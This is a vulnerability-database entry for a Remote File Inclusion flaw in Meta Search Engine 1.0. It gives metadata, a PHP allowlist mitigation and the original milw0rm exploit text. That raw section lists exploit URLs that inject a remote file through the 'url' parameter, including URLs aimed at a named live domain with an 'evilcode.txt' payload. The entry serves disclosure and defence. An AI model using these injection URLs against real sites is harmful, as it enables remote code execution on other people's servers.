Vendor: Meta Search Engine
By: Moudi
CVSS: 7,5 (HIGH)
Vulnerability: Remote File Inclusion
CWE: 98
Product Name: Meta Search Engine
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Meta Search Engine 1.0 Remote File Inclusion

Meta Search Engine 1.0 is vulnerable to Remote File Inclusion. An attacker can make the application include a remote file containing arbitrary code, usually by supplying a malicious URL, and that code is then executed on the web server.

Mitigation:

To mitigate this vulnerability, the application should validate user input and filter out any malicious code. Additionally, the application should be configured to only allow the inclusion of files from trusted sources.
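
One way to apply this mitigation, shown as an added example that is not code from Meta Search Engine or from the advisory. The vulnerable pattern is inferred from the advisory's note that `readfile($url)` is the issue; the template directory, the page names and the `resolve_page()` helper are hypothetical.

```php
<?php
// Added example; not code from Meta Search Engine. The vulnerable pattern is
// inferred from the advisory's note ("readfile($url) is the issue").

// Vulnerable pattern (for contrast): the request value reaches readfile()
// unchanged, so any path or URL wrapper PHP accepts is read and echoed.
//   readfile($_GET['url']);

// Hypothetical allowlist: request key => file shipped with the application.
const TEMPLATE_DIR = __DIR__ . '/templates';
const ALLOWED_PAGES = [
    'search'  => 'search.html',
    'results' => 'results.html',
];

/**
 * Map an untrusted request value to an allowlisted local file.
 * Returns the absolute path, or null when the value must be rejected.
 */
function resolve_page($requested): ?string
{
    // Arrays (url[]=x) and other non-strings are rejected outright.
    if (!is_string($requested)) {
        return null;
    }
    $key = strtolower($requested);
    if (!array_key_exists($key, ALLOWED_PAGES)) {
        return null; // covers http://, ftp://, php://, ../ and absolute paths
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . ALLOWED_PAGES[$key]);
    // realpath() resolves symlinks; confirm the result is still under $base.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$path = resolve_page($_GET['url'] ?? null);
if ($path === null) {
    http_response_code(400);
    exit('Invalid page');
}
readfile($path);
```

Setting `allow_url_fopen = Off` in php.ini additionally stops `readfile()` and similar functions from fetching remote URLs, which limits the impact if an unchecked call remains elsewhere in the code.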

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Meta Search Engine 1.0 Remote File Inclusion
==============================================================================

	[»] Script:             [ Meta Search Engine 1.0 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.mydlstore.com/product.php?productid=40826&cat=0&page=1  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ USD 12.99 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit RFI + LIVE : vulnerability ]===

[»] http://www.site.com/patch/?url=[RFI]&file=Search
[»] http://www.site.com/patch/index.php?url=[RFI]&file=Search

[»] http://www.mydlstore.net/metasearch/?url=evilcode.txt?&file=Search
[»] http://www.mydlstore.net/metasearch/index.php?url=evilcode.txt?&file=Search


Author: Moudi

###########################################################################

note: readfile($url) is the issue, so fd

# milw0rm.com [2009-07-21]